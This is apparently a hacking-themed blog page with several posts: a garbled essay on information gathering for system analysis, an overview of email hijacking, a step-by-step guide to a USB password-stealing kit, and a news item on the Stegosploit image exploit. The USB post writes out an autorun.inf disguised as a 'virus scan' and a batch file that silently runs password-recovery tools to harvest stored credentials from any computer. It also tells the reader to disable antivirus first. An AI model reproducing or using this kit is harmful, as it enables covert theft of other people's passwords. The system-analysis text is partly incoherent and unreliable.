Search Google for hacking

Sunday, 8 October 2017

How to Trace Mobile Number or Phone Location


Friday, 8 September 2017

Tools of Information Gathering for System Analysis

Tools of Information Gathering for System Analysis

This article throws light upon the top three tools of information gathering for system analysis. The tools are: 1.Interviews and Questionnaires 2.Revision of Literature, Procedures and Forms 3. On Site Observation.

Tool # 1. Interviews and Questionnaires:

Generally, the onsite observation is directed primarily towards describing and understanding events as they occur.
By this, we cannot get the profit.
On the other hand, we need to learn about people’s knowledge, feelings or motivations. Therefore, other information gathering tools are used for analysis.

If we wish to know about something, we simply ask someone about it directly, but we cannot get an riht answer. When asked by direct questions, the respondent may yield information that is invalid. The information can be successfully obtained with interviews or questionnaires.

Tool # 2. Revision of Literature, Procedures and Forms:

few system problems are difficult, therefore, as in the first step, a search of the literature through professionals; references and procedure manuals, company studies, government publications, or consultant studies is very useful. The primary drawback of this search is time. It is very difficult to such reports. Publications may be expensive and the information may be out dated due to a time lag in publication.
Procedures manuals and forms are very useful sources for the analyst. They describe the formation and functions of the present system. Up-to-date and good manuals save hours of information gathering time. Printed forms are widely used for capturing and providing information.
The following questions are decides the forms usefulness:


1. Do the forms include all the necessary information? What items should be added or detected?
2. How does the information in the form helps other users make for the better decisions?
3. Who use the form? How important are they to the user?
4. How readable and easy to follow is the form?
5. How many departments receive the existing form? Why?

Tool # 3. On Site Observation:

Another information gathering tool used in system studies is called the ‘on site observation’. On site observation is the process of recognising and noting people, objects and gets the information. The analyst’s role is that of an information seeker who is expected to be detached from the system being observed. The role permits participation with the user staff openly and freely.
The major objective of onsite observation is to get as close as possible to the real system being studied. For this reason, it is important that the analyst has the knowledge about the general make up and activities of the system. The following questions can provide the help in the onsite observations.
1. What is relationship with the other systems in the organisation?
2. Is it a primary or a secondary use in organisation?
3. Who runs the system? Who are the important people in it?
4. What kind of system is it? What does it do?
5. What is the history of system? How did it get to its preset stage of development?
Because, the analyst plays the role as an observer, the analyst follows a set of rules. While making observations, he is more likely to listen than talk. Furthermore, the analyst does not concentrate with the single person and ‘show the friendliness toward others.
1. Direct and Indirect Observation:
When the analyst actually observes the subject or the system at work, this system is called direct observation. If the analyst uses mechanical devices such as cameras and videotapes to capture information, this system is called indirect observation.
2. Structured and Unstructured Observation:
When the observer looks for and records, a specific action is called a structured observation unstructured methods place the observer in a situation to observer what every might be permanent at the time.
3. Natural and Contrived Observation:
A natural observation occurs in a setting such as the employee’s place where the work is completed by the employee. A contrived observation is set up by the observers in a place like laboratory.
4. Obtrusive and Unobtrusive Observation:
An obtrusive observation takes place when the respondent known that he is being observed. Unobtrusive observation takes place in a natural or contrived way and in this the respondent does not know about the observation.
Any of these methods may be used in information gathering. Natural, direct, obtrusive and unstructured observations are frequently used for reading the system. Electronic observation and monitoring methods are becoming widely used information gathering tools because of their speed, efficiency and low cost.
For example, some truck fleets use an electronic recorder system that records analyzes and reports information (on line) about the hours and minutes a vehicle was driven, driven faster than 60 miles per hours. If the onsite observation is used for the difficult system so that on site observation takes the more time.
ON site observations method of data gathering has the following problems:
1. Attitudes and motivations of subjects cannot be readily observed, only the actions that result from them.
2. Unproductive, long hours are often spent in an attempt to observe specific, one time activities or events.
3. Intruding into the users, area often results in adverse reactions by the staff. Therefore, adequate preparation and training is important.


Thursday, 15 June 2017

Email Hijacking


Email Hijacking, or email hacking, is a widespread menace nowadays. It works by using the following three techniques which are email spoofing, social engineering tools, or inserting viruses in a user computer.

Email Spoofing

In email spoofing, the spammer sends emails from a known domain, so the receiver thinks that he knows this person and opens the mail. Such mails normally contain suspicious links, doubtful content, requests to transfer money, etc.
Example

Social Engineering

Spammers send promotional mails to different users, offering huge discount and tricking them to fill their personal data. You have tools available in Kali that can drive you to hijack an email.
Social Engineering
Email hacking can also be done by phishing techniques. See the following screenshot.
Phishing
The links in the email may install malware on the user’s system or redirect the user to a malicious website and trick them into divulging personal and financial information, such as passwords, account IDs or credit card details.
Phishing attacks are widely used by cybercriminals, as it is far easier to trick someone into clicking a malicious links in the email than trying to break through a computer’s defenses.

Inserting Viruses in a User System

The third technique by which a hacker can hijack your email account is by infecting your system with a virus or any other kind of malware. With the help of a virus, a hacker can take all your passwords.

How to detect if your email has been hijacked?

  • The recipients of spam emails include a bunch of people you know.
  • You try to access your account and the password no longer works.
  • You try to access the “Forgot Password” link and it does not go to the expected email.
  • Your Sent Items folder contains a bunch of spams you are not aware of sending.

Quick tips

In case you think that your email got hijacked, then you need to take the following actions −
  • Change the passwords immediately.
  • Notify your friends not to open links that they receive from your email account.
  • Contact the authorities and report that your account has been hacked.
  • Install a good antivirus on your computer and update it.
  • Set up double authentication password if it is supported.

Monday, 5 June 2017

How to Hack Passwords Using a USB Drive


USB Drive
As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox.
There exists many tools for recovering these passswords from their stored places. Using these tools and a USB pen-drive, you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit:
MessenPassRecovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassViewRecovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
IE PassviewIE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0
Protected Storage PassViewRecovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more.
PasswordFoxPasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed:
Record Index, Web Site, User Name, Password, User Name Field and Password Field.

Preparing Your USB Drive for Password Hacking:

Here is a step by step procedure to create the password hacking toolkit:
You must temporarily disable your antivirus before following these steps.
  1. Download all the 5 tools, extract them and copy only the executable files (.exe files) onto your USB Pendrive.
    ie: Copy the files – mspass.exemailpv.exeiepv.exepspv.exe and passwordfox.exe into your USB Drive.
  2. Create a new Notepad and write the following text into it:
    [autorun] open=launch.bat ACTION= Perform a Virus Scan
    save the Notepad and rename it from New Text Document.txt to autorun.inf. Now copy the autorun.inf file onto your USB pen-drive.
  3. Create another Notepad and write the following text onto it:
    start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start passwordfox.exe /stext passwordfox.txt 
    Save the Notepad and rename it from New Text Document.txt to launch.batCopy the launch.bat file to your USB drive.
    Now your rootkit is ready and you are all set to sniff the passwords. You can use this pen-drive on on any computer to sniff the stored passwords. Just follow these steps:
    1. Insert the pen-drive and the auto-run window will pop-up. (This is because, we have created an auto-run pen-drive).
    2. In the pop-up window, select the first option (Perform a Virus Scan).
    3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
    4. Remove the pen-drive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP, Vista and 7.
NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

RECOMMENDED POSTS FOR YOU

Monday, 29 May 2017

Hacking using just Image 😓

Next time when someone sends you a photo of a cute cat or a hot chick than be careful before you click on the image to view — it might hack your machine.

Yes, the normal looking images could hack your computers — thanks to a technique discovered by security researcher Saumil Shah from India.

Dubbed "Stegosploit," the technique lets hackers hide malicious code inside the pixels of an image, hiding a malware exploit in plain sight to infect target victims.

Just look at the image and you are HACKED!

Shah demonstrated the technique during a talk titled, "Stegosploit: Hacking With Pictures," he gave on Thursday at the Amsterdam hacking conference Hack In The Box.

According to Shah, "a good exploit is one that is delivered in style."

Keeping this in mind, Shah discovered a way to hide malicious code directly into an image, rather than hiding it in email attachments, PDFs or other types of files that are typically used to deliver and spread malicious exploits.

To do so, Shah used Steganography — a technique of hiding messages and contents within a digital graphic image, making the messages impossible to spot with the naked eye.

Here's How to Hack digital pictures to send malicious exploits:


Until now Steganography is used to communicate secretly with each other by disguising a message in a way that anyone intercepting the communication will not realise it's true purpose.

Steganography is also being used by terrorist organisations to communicate securely with each other by sending messages to image and video files, due to which NSA officials are forced to watch Porn and much porn.

However in this case, instead of secret messages, the malicious code or exploit is encoded inside the image’s pixels, which is then decoded using an HTML 5 Canvas element that allows for dynamic, scriptable rendering of images.

The "Secret Sauce" behind Stegosploit — this is what Shah calls it.


"I don’t need to host a blog," Shah told Motherboard, "I don’t need to host a website at all. I don’t even need to register a domain. I can [just] take an image, upload it somewhere and if I just point you toward that image, and you load this image in a browser, it will detonate."
The malicious code, dubbed IMAJS, is a combination of both image code as well as JavaScript hidden into a JPG or PNG image file. Shah hides the malicious code within the image’s pixels, and unless somebody zoom a lot into it, the image looks just fine from the outside.


Video Demonstration:


Shah demonstrated to Lorenzo Franceschi of Motherboard exactly how his hack works. He used Franceschi’s profile picture and then prepared a demonstration video using his picture as the scapegoat.

In the first video presentation, Shah shows a step by step process on how it is possible to hide malicious code inside an image file using steganography technique. You can watch the video given below:



In the second video, Shah shows how his Stegosploit actually works. His exploit works only when the target opens the image file on his or her web browser and clicks on the picture.

You are HACKED!

Once the image is clicked, the system’s CPU shoots up to 100 percent usage, which indicates the exploit successfully worked. The malicious code IMAJS then sends the target machine’s data back to the attacker, thereby creating a text file on the target computer that says — "You are hacked!"



Shah also has programmed his malicious image to do more stealthy tasks, like downloading and installing spyware on victim’s machine, as well as stealing sensitive data out of the victim’s computer.

The bottom line here is:


You should not presume the image files as "innocent" anymore, as they can hide malicious code deep inside its pixels that could infect your computers.

Therefore, always make sure before you click on one.


Shah has been working on the research [PDF] during his spare time for almost five years, but he has not tested his technique on popular image sharing websites like Dropbox or Imgur. He also admitted that his method might not work everywhere.

Fechure post

Best HACKERs App